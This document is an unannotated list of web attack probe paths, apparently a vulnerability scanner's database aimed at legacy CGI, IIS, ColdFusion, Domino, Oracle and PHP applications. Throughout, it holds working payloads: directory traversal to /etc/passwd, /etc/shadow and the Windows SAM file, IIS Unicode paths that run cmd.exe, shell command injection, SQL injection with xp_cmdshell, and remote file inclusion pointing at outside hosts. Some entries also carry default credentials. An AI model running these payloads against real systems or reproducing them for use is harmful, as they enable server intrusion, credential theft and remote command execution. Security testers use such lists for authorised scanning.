/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cgi-bin/uploadn.asp
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
:8010/d://
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
:8010/c://
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/postcard.pl
/examples/servlet/SnoopServlet
/cgi-bin/calender_admin.pl
/scripts/Carello/add.exe
/cgi-bin/.fhp
/cgi-bin/search.pl
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPassword_1
/cgi-win/uploader.exe
:8080/examples/jsp/snp/anything.snp
/~admin/
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.cgi%3fletter=
/inc/odbc.inc
/pi_admin.admin
/cgi-bin/cookmail/cookmail
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/ConsoleHelp/
/cgi-bin/gettext.pl
/.html/............/autoexec.bat
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/survey.cgi
/AspUpload/Samples/Test11.asp
/ubb/cgi-bin/postings.cgi
/4DBin/_/../winnt/repair/sam._
/ows-bin/perlidlc.bat?&dir
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/scripts/script.cmd%3f&dir
/stats/
/cgi-home/
/~lp/
/search97/search97.vts
/PDG_Cart/order.log
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/~bin/
/cfdocs/expeval/openfile.cfm
/cgi-bin/sendmail.cgi
/mysql.class
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
:8080/../../../conf/Eserv.ini
/cgi-bin/wsendmail.exe
/iissamples/exair/search/qsumrhit.htw
/~nobody/etc/
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/cgi-bin/FormMail.pl
/cgi-bin/allmanage.cgi
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/perl.exe
/cgi-bin/scripts/cart.pl
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/wwwboard/wwwadmin.cgi
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/cgi-bin/mailmepro.exe
/iisadmpwd/_AuthChangeUrl
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/files.pl
/wwwboard/wwwadmin.pl
/scripts/mailme.exe
/scripts/slxweb.dll/admin
/robots.txt
/cgi-bin/powerup/r.pl?FILE=main.html
/_private/shopping_cart.mdb
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/alibaba.pl
/default.php%20%20
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
/cgi-bin/dfire.cgi
/scripts/wguest.exe
/cgi-bin/forumdisplay.cgi
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/auctiondeluxe/auction.pl?action=tst
/~log/
/cgi-bin/handler
/names.nsf/Open
:12000
/example.jsp..
/../../../../../../../boot.ini
/scripts/bdir.htr
/interscan/cgi-bin/FtpSave.dll?no
/ads/adpassword.txt
/cgi-bin/formmail.cgi
/remote_login.pl%20
/cgi-bin/formto.pl
/cgi-bin/futureforum.cgi
/session/adminlogin?RCpage=/sysadmin/index.stm
/examples/applications/bboard/bboard_frames.html
/deletecontact.php?item_id=100+OR+TRUE+;
:8080/\../readme.txt
//WEB-INF/
/cgi-bin/cookmail
/cfdocs/expeval/exprcalc.cfm
:9998/
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/active.log
/logs/webstar.log
/global.cnf
/scripts/process_bug.cgi
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/cgi-bin/pfdisplay
/hostingcontroller
/cgi-bin/php.cgi
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
:8080/examples/servlet/SnoopServlet
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
:8888/
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/database.nsf?EditDocument
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/advwebadmin
:8000/servlet/jsp/../../tst.txt
/build.cgi
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/run/forma
/cgi-bin/nph-test-cgi
/index.search
/cgi-bin/wwwboard.pl
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/cgi-bin/fi
/phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru('/bin/ls')."
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/scripts/test.exe
/components/AspUpload/Samples/UploadScript11.asp
:8080/index.js%2570
/inc/sql.inc
/scripts/perl.exe
/iisadmpwd/aexp2b.htr
/fcgi-bin/echo2
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/odbc.inc
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/processit.pl
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/sbin/
/cgibin/amadmin.pl?setpasswd
/servlet/WebPopServlet?config=uii.txt
/cgi-bin/edit.pl
/cgi-bin/adpassword.txt
/cgi-bin/lsin.exe
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/pi?page=document/show_file&id=
/."./."./Perl/eg/core/findtar
/cgi-bin/input.bat
/.photon/voyager/config.full
/pls/demo/owa_util.signature
/cgi-bin/echo
/.../.../scandisk.log
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/java/
/cgi-bin/texis.exe/ngohos
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/ows-bin/*.bat?&dir
/search.dll?search?query=%00&logic=AND
/domcfg.nsf/URLRedirect/%3fOpenForm
:8088
/cgi-bin/awl/auctionweaver.pl
/include/dbconfig.inc
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/cgi-bin/webdata_test.pl
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/ChipCfg.cfg
/search%3f
/admin/?op=%c0
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/adsamples/config/site.csc
/domcfg.nsf/%3fopen
//WEB-INF/web.xml
/cgi-bin/bb-ack.sh
/cgi-bin/mailform.exe
/cgi-bin/OrderForm.cgi
/~logs/
/oprocmgr-status
/cgi-bin/scripts/cart.pl?vars
:3128/../../../../
/a.jsp//..//..//..//..//..//../winnt/win.ini
/global.asax.cs
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/compose.php
/iishelp/iis/misc/iirturnh.htw
/index.jsp..
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
:8080/../ssd.ini
/cgi-bin/newsdesk.cgi?t=../pass.txt
/oetaki/oetaki.cgi
:9090
m/search.dll?search?query=/&logic=AND
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/cgi-bin/
/way-board/way-board.cgi?db=way-board.cgi%00
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/test.bat
/cgi-bin/uncgi
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/default.php3%20%20
/cgi-bin/tst.bat
/scripts/wsendmail.exe
/iisadmpwd/achg.htr
:8000/servlet/ssifilter/../../test.jsp
/scripts/mailsend.exe
/cgi-bin/phf
/cgi-bin/phpinfo.php
/_vti_bin/shtml.dll
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+
/cgi-bin/get16.exe
/cgi-bin/hello.bat
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/webwho.pl
/scripts/rguest.exe
/asearch.cnf
/servlet/file
/scripts/postie.cgi
/global.asa+.htr
/cgi-bin/formmail.pl
/msadc/samples/adctest.asp
/doc/
/subscribe.pl
/cgi-bin/html_page?TEMPLATE=main
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/++./
/bin/common/user_update_admin.pl
/include/test.php
/cgi-bin/db2www.exe/../../db2www.ini
/scripts/formvar.exe
/cgi-bin/rmp_query
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
:8000/./WEB-INF/web.xml
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/file/index.jhtml
/domcfg.nsf/viewname%3fSearchView&Query="*"
/cgi-bin/ibillpm.pl
:8100//WEB-INF/web.xml
/cgi-bin/html_page?TEMPLATE=main
:8383
/scripts/script.bat%3f&dir
/index.php3%20%20
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/decsadm.nsf
/cgi-bin/plusmail
/cgi-bin/msn.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/db2_doc/html/db2srsen.exe
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/ROADS/cgi-bin/search.pl?form=search.pl%00
/++/
/cgi-bin/simple/config/menu
/includes/global.inc
:8010/..../
/cgi-bin/cs.exe?action=
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/cgi-bin/infosrch.cgi
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/."./."./winnt/reapir/sam._%20.pl
/secret/index.html
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/wwwboard/passwd.txt
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
:6346/........../windows/win.ini
/userinfo.php?uid=33;
/a/
/global.asa%20.pl
/_vti_bin/_vti_aut/mtd2lv.dll
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/pls/demo/%0aowa_util.signature
/cgi-bin/passcfg
/upload.html
/pls/admin_/?
/doc/packages/
/iissamples/exair/howitworks/codebrws.asp
/pls/demo/%20owa_util.signature
/%2ehtpasswd
/stat/
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts
/session/pagecount?page=
/run.cgi
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/tst/psoft.hsphere.CP/tst/?template_name=x
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/soap/servlet/soaprouter
/iisadmin/ism.dll%3fhttp/dir
/sbin/nscgi.cfg
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/textcounter.pl
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/pals-cgi?palsAction=restart&documentName=pals-cgi
/cfbin/board.cgi
/*.shtml/
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/index.js%2570
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cfdocs/expeval/eval.cfm
/servlet/FormMailServlet?juhu.txt
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/index.JSP
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/file/main.shtml
/adcycle/AdLogin.pm
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/WebDB/admin_/
/cgi-bin/wguest.exe
/cfdocs/snippets/evaluate.cfm
/....../
/..\..\..\winnt\repair\sam._
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/webmacro/Page?db=tst&wmtemplate=ttt
/servlet/SessionServlet
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/traceroute.cgi
/dms/AggreSpy
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/.nsf/../winnt/win.ini
/.box/../winnt/win.ini
/webadmin.ntf
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/cgiwrap
/ezboard/ezman.cgi
/cgi-bin/web2mail.cgi
:901
:4096/../../../winnt/repair/sam._
/test.php3
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/statsconfig.pl
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_users
/scripts/foo.cmd?xxx&dir
/cgi-bin/ftpdiag.cgi
:3000/../../hosts
/cgi-bin/MailPost.exe
/cgi-bin/phpinfo.php3
/cgi-bin/core
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/postie.cgi
/\.../
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/iisadmpwd/aexp4b.htr
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
:8888/ab2/@Ab2Admin
/cgi/
/stronghold-status
/include/config.inc
/scripts/samples/details.idc
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/file/index.jsp
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/internal/
/.nsf/../lotus/domino/notes.ini
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/%3f.jsp
:10000/net/
/cgi-bin/futureforum3.cgi
/cgi-bin/empower?DB=mungowitsch
/scripts/emurl/RECMAN.dll?
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message
/cgi-bin/flexform.cgi
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/globals.pl
/example.jsp%81
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/Globals.jsa
/cfdocs/expeval/displayopenedfile.cfm
/cgi-bin/mailnews.cgi
/scripts/dbman/db.cgi?db=tedb
/globals.jsa
:9090//etc/shadow
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
:2301
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/file/main.jsp
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/ads/admin.cgi
/servlet/test/pathInfo/test
/_vti_bin/fpcount.exe
/*.jsp/
/index.php?file=http://xxx&fcmd=ls
/config/
/jsp_test/PoolMan.jsp
/PoolMan.jsp
:8080/.jsp/WEB-INF/classes/Env.java
/cgi-bin/AT-admin.cgi
/_vti_log/author.log
/iissamples/issamples/oop/qsumrhit.htw
/scripts/cgimail.exe
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/hwtestio
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/./admin/
/suche%3f
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/post32.exe
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/forum/forumdisplay.php?s=&forumid=
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/oetaki/oekakibbs.conf
:2301/Proxy/LoginResponse
/_vti_bin/shtml.dll/tstt.htm
/components/AspUpload/Samples/Test11.asp
:8080/%252e%252e/%252e%252e/%00.jsp
/basilix/basilix.php?username=blah;ls
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/scripts/mail.cgi
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
/cgi-bin/download.pl?s=path&c=txt&f=fn
/cgi-bin/jj
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/cgi-bin/paramtool
/cgi-bin/formvar.exe
/cgi-bin/cvsweb.cgi
/ows-bin/owa/owa%5futil%2esignature
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/post-query?
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/manage/cgi/cgiproc?Nocfile=
/forums/list.php
/cgi-bin/dcguest.cgi
/inc/sendmail.inc
/index.php%20%20
/_vti_bin/_vti_aut/dvwssr.dll
/cgi-bin/debug.cgi
/../../template/shared/indexTemplate.xml
/servlet/com.unify.ewave.servletexec.UploadServlet
/imp/compose.php
/ez2000/ezman.cgi
/index.php3?vhosts=http://go.to
/cgi-bin/query%3f
/search97/s97_cgi.exe
/ccbill/
/cgi-bin/lb5000/search.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/imagemap.exe
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/cgi-bin/getdoc.cgi
/iisadmpwd/anot.htr
/global.asa\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/mailmepro.exe
/scripts/toos/mkilog.exe
/webadmin.nsf
/cgi-bin/htsearch?exclude=%60%60
/PDG_Cart/shopper.conf
/servlet/ssifilter/../../test.jsp
/eg/source.asp
/cfdocs/snippets/viewexample.cfm?Tagname=
:8010//
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/piranha/secure/passwd.php3?username=piranha&passwd=q
/isapi/tstisapi.dll
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/CFDOCS/exampleapps/
/cgi-bin/webgais
/cgi-bin/ssi/cgi-bin/ssi
/ppwb/Temp/
/cgi-bin/bnbform.pl
/web.config
/scripts/postie.exe
/cgi-bin/whois.cgi
/cgi-bin/bb-hostsvc.sh
:8888/cgi-bin/admin/admin
/admin-serv/config/admpw
/%2ehtaccess
/scripts/repost.asp
/../scandisk.log
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/cgi-bin/bb-histlog.sh
/cgi-bin/ws_mail.cgi?kill=ng
/4DBin/_/C:/winnt/repair/sam._
/../../winnt/win.ini%00examples/jsp/hello.jsp
/cgi-bin/classifieds.cgi
/4DBin/_/../boot.ini
/components/AspUpload/Samples/DirectoryListing.asp
/cgi-bin/disk2server.cgi
/pls/demo/owa_util.showsource?cname=owa_util
/cgi-bin/allmanage.pl
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/basilix/basilix.php3?username=blah;ls
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/story.cgi?next=
/cgi-local/
/cgi-bin/bb-replog.sh
/cgi-bin/mailto?MailTo=swoopme@hotmail.com&text=tst&EmailForm=/cgi-bin/mailto
/include/sql.php
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/secret/index.htm
/cgi-bin/powerup/r.cgi?FILE=main.html
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/inc/db.inc
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/cgi-bin/maillist.pl
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/servlet/viewsource.jsp
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/cgi-bin/script.bat%3f&dir
/cgi-bin/ezmlm-cgi
/cgi-bin/aliredir.exe
/config.inc
/cgi-bin/guestadd.pl
/servlet/psoft.hsphere.CP
/inc/test.php
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/cgi-bin/nph-maillist.pl
/quikstore.cfg
/cgi-bin/w3-msql/index.html
/cgi-bin/websendmail
/cgi-bin/simple
/wwwboard/wwwboard.pl
:800/../..\
/_pages/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/cgi-bin/db2www/../../db2www.ini
/cgi-bin/man.sh
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/stronghold-info
/SiteServer/Admin/knowledge/dsmgr/default.asp
/./WEB-INF/web.xml
/cgi-bin/aglimpse
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/servlet//..//../o.jsp
/guestbook/dcguest.cgi
/cgi-bin/mailfile.cgi?real_name=rc&email=swoopme@hotmail.com&filename=mailfile.cgi
/cgi-bin/excite
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/forum-admin.pl
/cgi-bin/input2.bat
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/test-cgi
/iissamples/exair/search/qfullhit.htw
/servlet/DMSDump
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/cgi-bin/csvform.pl?file=/bin/ls%00|
/example%2ejsp
/servlet/ServletManager?username=servlet&password=manager
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
/pservlet.html
/cgi-bin/lastlines.cgi
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/clickresponder.pl
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/demo/basic/info/info.jsp
/cgi-bin/finger
/cd/../config/html/cnf_gi.htm
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=x
/Admin_files/order.log
/cgi-bin
/site/eg/source.asp
/cgi-bin/finger.cgi
/cgi-bin/webdriver
/ping
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/viewsource.jsp
/cgi-bin/debug.pl
/cgi-bin/abuse.man?file=&domain=&script=
/cgi-bin/infogate
/index.php3.%5c../..%5cconf/httpd.conf
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/test.jsp../
/global.asa
/webres/discuss/passwd.txt
/../../../../config.sys
:8100//WEB-INF/webapp.properties
/demo/basic/info/info.jsp
/cgi-bin/auction/auction.pl?action=tst
/scripts/bigconf.cgi
/scripts/mailform.exe
/cgi-bin/cachemgr.cgi
/ez2000/ezboard.cgi
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/SiteServer/Admin/commerce/foundation/DSN.asp
/opendir.php?requesturl=/etc/hosts
/include/sql.inc